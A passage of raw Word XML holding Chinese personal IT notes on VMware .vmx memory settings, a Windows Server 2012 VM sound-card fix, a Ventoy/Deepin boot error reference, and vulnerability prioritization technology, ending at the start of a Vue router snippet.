    </w:p>
    <w:p w14:paraId="06303989" w14:textId="77777777" w:rsidR="00C6541E" w:rsidRDefault="00C6541E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C811A0F" w14:textId="77777777" w:rsidR="00C6541E" w:rsidRDefault="00C6541E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A1E97A0" w14:textId="57740614" w:rsidR="001E33D3" w:rsidRPr="003F0B82" w:rsidRDefault="001E33D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.vmx</w:t>
      </w:r>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidR="003F0B82" w:rsidRPr="003F0B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（一定要记事本打开，使用</w:t>
      </w:r>
      <w:r w:rsidR="003F0B82" w:rsidRPr="003F0B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vscode</w:t>
      </w:r>
      <w:r w:rsidR="003F0B82" w:rsidRPr="003F0B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>打开，会导致中文编码错乱，得手动重新填写）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D5517B" w14:textId="1AAA78A5" w:rsidR="00C6541E" w:rsidRDefault="001E33D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁用内存交换文件</w:t>
      </w:r>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>memory swap files .vmem</w:t>
      </w:r>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不产生</w:t>
      </w:r>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VMEM</w:t>
      </w:r>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A3C4D6" w14:textId="1BDFF917" w:rsidR="001E33D3" w:rsidRPr="001E33D3" w:rsidRDefault="001E33D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mainMem.useNamedFile = "FALSE</w:t>
      </w:r>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACA4874" w14:textId="52751EDE" w:rsidR="001E33D3" w:rsidRPr="001E33D3" w:rsidRDefault="001E33D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001E33D3">
        <w:t>禁用页面交换</w:t>
      </w:r>
      <w:r w:rsidRPr="001E33D3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6A81CC" w14:textId="2BAFF0C1" w:rsidR="001E33D3" w:rsidRDefault="001E33D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">sched.mem.pshare.enable = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FALSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B8830B" w14:textId="4321CC08" w:rsidR="001E33D3" w:rsidRPr="001E33D3" w:rsidRDefault="001E33D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001E33D3">
        <w:t>禁用内存整理</w:t>
      </w:r>
      <w:r w:rsidRPr="001E33D3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64026784" w14:textId="77777777" w:rsidR="001E33D3" w:rsidRPr="001E33D3" w:rsidRDefault="001E33D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>MemTrimRate = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4A2F42" w14:textId="658B1FAB" w:rsidR="001E33D3" w:rsidRPr="001E33D3" w:rsidRDefault="001E33D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">prefvmx.useRecommendedLockedMemSize = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>TRUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DB180C" w14:textId="029D57A3" w:rsidR="001E33D3" w:rsidRDefault="001E33D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">prefvmx.minVmMemPct = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADA5DF4" w14:textId="2F90FCB5" w:rsidR="001E33D3" w:rsidRDefault="001E33D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001E33D3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁用按比例减少内存分配</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411025AD" w14:textId="2B3AB8C5" w:rsidR="001E33D3" w:rsidRDefault="001E33D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001E33D3">
        <w:t xml:space="preserve">MemAllowAutoScaleDown = </w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="001E33D3">
        <w:t>FALSE</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534667A3" w14:textId="77777777" w:rsidR="001E33D3" w:rsidRDefault="001E33D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02247721" w14:textId="77777777" w:rsidR="00C6541E" w:rsidRDefault="00C6541E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34FB5495" w14:textId="4E99AFF5" w:rsidR="00966782" w:rsidRDefault="00966782" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="854" w:name="_Toc159780274"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟机内声卡问题</w:t>
      </w:r>
      <w:bookmarkEnd w:id="854"/>
    </w:p>
    <w:p w14:paraId="0084D9D7" w14:textId="51707A46" w:rsidR="00966782" w:rsidRDefault="00A171E0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在此记录一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">23.10.31 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遇到的问题，</w:t>
      </w:r>
      <w:r w:rsidR="009532A4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidR="009532A4">
        <w:t xml:space="preserve"> 2012 </w:t>
      </w:r>
      <w:r w:rsidR="0025756D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内部声卡识别不到任何音频设备。</w:t>
      </w:r>
      <w:r w:rsidR="0025756D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> vmware</w:t>
      </w:r>
      <w:r w:rsidR="0025756D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的其他虚拟机可以正常连接声音；</w:t>
      </w:r>
      <w:r w:rsidR="0025756D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vmware</w:t>
      </w:r>
      <w:r w:rsidR="0025756D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的声音管理正常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8F4330" w14:textId="0A9E6B07" w:rsidR="0025756D" w:rsidRDefault="0025756D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误尝试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0CF311" w14:textId="728BE7F5" w:rsidR="0025756D" w:rsidRDefault="0025756D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vmware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EE2846" w14:textId="60E8D799" w:rsidR="0025756D" w:rsidRDefault="0025756D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vm</w:t>
      </w:r>
      <w:r>
        <w:t>tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1AC4EC" w14:textId="6FA78DA5" w:rsidR="0025756D" w:rsidRDefault="0025756D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t>2012</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的声卡驱动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FE504B" w14:textId="6CA276C3" w:rsidR="0025756D" w:rsidRDefault="0025756D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>专用声卡</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0057A310" w14:textId="77777777" w:rsidR="0025756D" w:rsidRDefault="0025756D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E9D0256" w14:textId="7BB3DA29" w:rsidR="0025756D" w:rsidRDefault="0025756D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正确尝试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575A83DD" w14:textId="1136F91F" w:rsidR="0025756D" w:rsidRDefault="0025756D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卸载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t>2012</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>声卡，重新安装声卡。</w:t>
      </w:r>
      <w:r w:rsidR="00DB7D1B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算机管理直接移除声卡设备，然后如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755625F9" w14:textId="5F00E24D" w:rsidR="00966782" w:rsidRDefault="001652B6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001652B6">
        <w:t>https://www.intel.cn/content/www/cn/zh/download/17480/intel-network-adapter-driver-for-windows-server-2012-r2.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD0817" w14:textId="5C53A564" w:rsidR="00966782" w:rsidRPr="00966782" w:rsidRDefault="00DB7D1B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装那个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>driver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>声卡就好了，不用安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PROset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D11AAF" w14:textId="77777777" w:rsidR="00966782" w:rsidRDefault="00966782" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B09661C" w14:textId="77777777" w:rsidR="00966782" w:rsidRDefault="00966782" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CCF9599" w14:textId="33FDB486" w:rsidR="00966782" w:rsidRDefault="009B1FDC" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="855" w:name="_Toc159780275"/>
      <w:r>
        <w:t>硬件运维及重装系统</w:t>
      </w:r>
      <w:bookmarkEnd w:id="855"/>
    </w:p>
    <w:p w14:paraId="11C5C75C" w14:textId="77777777" w:rsidR="00966782" w:rsidRDefault="00966782" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AFE824" w14:textId="78FF395C" w:rsidR="00966782" w:rsidRPr="00966782" w:rsidRDefault="009B1FDC" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="856" w:name="_Toc159780276"/>
      <w:r w:rsidRPr="009B1FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ventoy</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Deepin</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统出现</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Error verification failed 0x1A Security violation</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1FDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:bookmarkEnd w:id="856"/>
    </w:p>
    <w:p w14:paraId="3C08EA5B" w14:textId="34C1E385" w:rsidR="00966782" w:rsidRDefault="009B1FDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1FDC">
        <w:t>https://blog.csdn.net/qq_52410625/article/details/125898725</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC75CF0" w14:textId="77777777" w:rsidR="00966782" w:rsidRDefault="00966782" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EF6F04D" w14:textId="77777777" w:rsidR="009B1FDC" w:rsidRDefault="009B1FDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B539C2" w14:textId="77777777" w:rsidR="009B1FDC" w:rsidRDefault="009B1FDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D60FF16" w14:textId="77777777" w:rsidR="009B1FDC" w:rsidRDefault="009B1FDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6515C373" w14:textId="77777777" w:rsidR="009B1FDC" w:rsidRDefault="009B1FDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D957D82" w14:textId="77777777" w:rsidR="009B1FDC" w:rsidRDefault="009B1FDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61FF6B33" w14:textId="77777777" w:rsidR="009B1FDC" w:rsidRDefault="009B1FDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A2E72BE" w14:textId="77777777" w:rsidR="009B1FDC" w:rsidRDefault="009B1FDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44AB3099" w14:textId="77777777" w:rsidR="00966782" w:rsidRDefault="00966782" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6595A3DA" w14:textId="77777777" w:rsidR="00966782" w:rsidRDefault="00966782" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311C1117" w14:textId="6442E899" w:rsidR="00F5250B" w:rsidRDefault="00804727" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="857" w:name="_Toc159780277"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>VPT:</w:t>
      </w:r>
      <w:r>
        <w:t>漏洞优先级技术</w:t>
      </w:r>
      <w:bookmarkEnd w:id="857"/>
    </w:p>
    <w:p w14:paraId="25D16413" w14:textId="77777777" w:rsidR="00FA01F9" w:rsidRDefault="00FA01F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DACE5F0" w14:textId="5BA51AE0" w:rsidR="00804727" w:rsidRDefault="00EC5A01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C95493" w14:textId="41CDEDCE" w:rsidR="00EC5A01" w:rsidRDefault="00907374" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00907374">
        <w:t>https://zhuanlan.zhihu.com/p/407460633</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DF7E6C" w14:textId="77777777" w:rsidR="00804727" w:rsidRDefault="00804727" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507CB4BE" w14:textId="31C19FAA" w:rsidR="00F5250B" w:rsidRDefault="00121F4C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00121F4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其项目关键点描述是：要意识到永不可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00121F4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>100%</w:t>
      </w:r>
      <w:r w:rsidRPr="00121F4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打补丁；和</w:t>
      </w:r>
      <w:r w:rsidRPr="00121F4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IT</w:t>
      </w:r>
      <w:r w:rsidRPr="00121F4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运维联合行动（创造双赢）；利用现有的扫描数据和流程；用</w:t>
      </w:r>
      <w:r w:rsidRPr="00121F4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VPT</w:t>
      </w:r>
      <w:r w:rsidRPr="00121F4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（“</w:t>
      </w:r>
      <w:r w:rsidRPr="00121F4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Vulnerability prioritization technology</w:t>
      </w:r>
      <w:r w:rsidRPr="00121F4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”漏洞优先级技术）工具来增强弱点评估以更好的确定优先级。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F3A34D" w14:textId="77777777" w:rsidR="00D91FD3" w:rsidRDefault="00D91FD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECC79B1" w14:textId="77777777" w:rsidR="00D91FD3" w:rsidRDefault="00D91FD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    createRouter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35656866" w14:textId="77777777" w:rsidR="00D91FD3" w:rsidRDefault="00D91FD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    createWebHistory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E62D684" w14:textId="77777777" w:rsidR="00D91FD3" w:rsidRDefault="00D91FD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>} from 'vue-router'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CC480B" w14:textId="77777777" w:rsidR="00D91FD3" w:rsidRDefault="00D91FD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F4896A" w14:textId="77777777" w:rsidR="00D91FD3" w:rsidRDefault="00D91FD3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const routes = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4882EC" w14:textId="77777777" w:rsidR="00D91FD3" w:rsidRDefault="00D91FD3" w:rsidP="009222EB">
      <w:pPr>
